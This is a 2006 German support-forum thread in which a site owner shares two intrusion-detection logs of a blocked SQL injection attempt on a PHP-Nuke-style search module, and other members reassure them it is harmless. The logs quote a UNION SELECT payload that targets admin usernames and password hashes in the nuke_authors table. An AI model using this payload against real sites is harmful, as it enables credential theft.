[Union] Hack detected (0).... ??

Begonnen von Christian001, 11 Juni 2006, 17:00:48

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Drucken
Nach unten Seiten1
Benutzer-Aktionen

Christian001

11 Juni 2006, 17:00:48
Mahlzeit allerseits! ;)
Ich wollte Euch nur mal eine Systemnachricht zukommen lassen, die ich gestern gekriegt habe und fragen ob ich das richtig verstanden hab.
Wie ich das sehe, war das entweder ein erfolgloser Hack, oder es war einfach nur eine Fehleingabe. Schätze ersteres. Wer das auch immer versucht hat, scheint NUKE-Usertabellen aufgerufen zu haben und da es die ja nicht gibt, wirds wohl auch wenig gebracht haben. Kann mir jemand sagen ob das jetzt irgendein Problem ist?
Vielen Dank schonmal.
Christian

Hier die Nachricht:

Zitat[Union] Hack detected (0), on 72px

11-06-2006 00:27:59 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[type] = stories 
_GET[topic] =   
_GET[days] = 0
_GET[sid] = 0
_GET[name] = Search
_GET[query] = p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.105.109.61
QUERY_STRING:         type=stories&topic=&days=0&sid=0&name=Search&query=p0hh0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /com/modules.php?type=stories&topic=&days=0&sid=0&name=Search&query=p0hh0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          3288
REMOTE_HOST:         
HTTP_REFERER:         http://www.72px.de/com/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP_X_FORWARDED_FOR:


siteadress: http://www.72px.de/com

Ah ja.. IRGENDWAS muss die Person jedenfalls angezeigt bekommen haben, denn es wurde eine Google-Anzeige angezeigt. Das weiss ich, weil direkt danach die Mail kam, dass der Google-Bot den selben Hack-Versuch gemacht hat! *g* Wird wohl einfach die selbe "Seite" aufgerufen haben. Hier mal die Nachricht dazu:

Zitat11-06-2006 00:35:06 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[type] = stories 
_GET[topic] =   
_GET[days] = 0
_GET[sid] = 0
_GET[name] = Search
_GET[query] = p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          66.249.72.198
QUERY_STRING:         type=stories&topic=&days=0&sid=0&name=Search&query=p0hh0nsee%25\')+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /com/modules.php?type=stories&topic=&days=0&sid=0&name=Search&query=p0hh0nsee%25\')+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          34547
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mediapartners-Google/2.1
HTTP_X_FORWARDED_FOR:


siteadress: http://www.72px.de/com

Andi

#1
11 Juni 2006, 17:09:46
Hi :)

bitte lesen:
http://www.pragmamx.org/forum-topic-16352.0.html

und keine weiteren Gedanken drum machen ;)
schön´s Grüssle, Andi

Christian001

#2
11 Juni 2006, 17:17:23
Hey Andi... danke! Ich dachte mir schon, dass das nicht gefährlich war.. schon alleine ma das prefix der Usertabelle..da hätte die (ich hab grade beschlossen, wieso eigentlich immer annehmen, dass so Hacker-Deppen Männer sind.. hehe) lange hacken können.
Naja gut dann lösch doch mal den Thread für mich.. das ist ja in dem anderen zur Genüge behandelt! :)
Thx
Christian

Andi

#3
11 Juni 2006, 17:36:57
Zitatdann lösch doch mal den Thread für mich..

Lass doch, doppelt gemoppelt hält besser ;)  ;D
schön´s Grüssle, Andi
Drucken
Nach oben Seiten1
Benutzer-Aktionen